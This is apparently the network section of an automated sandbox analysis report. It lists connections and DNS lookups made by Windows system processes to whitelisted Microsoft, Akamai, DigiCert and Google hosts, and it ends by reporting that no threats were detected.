MoUsoCoreWorker.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.32.74:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.124.78.146
whitelisted
google.com
  • 142.250.184.238
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 40.126.32.74
  • 40.126.32.138
  • 20.190.160.3
  • 20.190.160.14
  • 20.190.160.4
  • 20.190.160.5
  • 20.190.160.128
  • 40.126.32.133
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

No threats detected
No debug info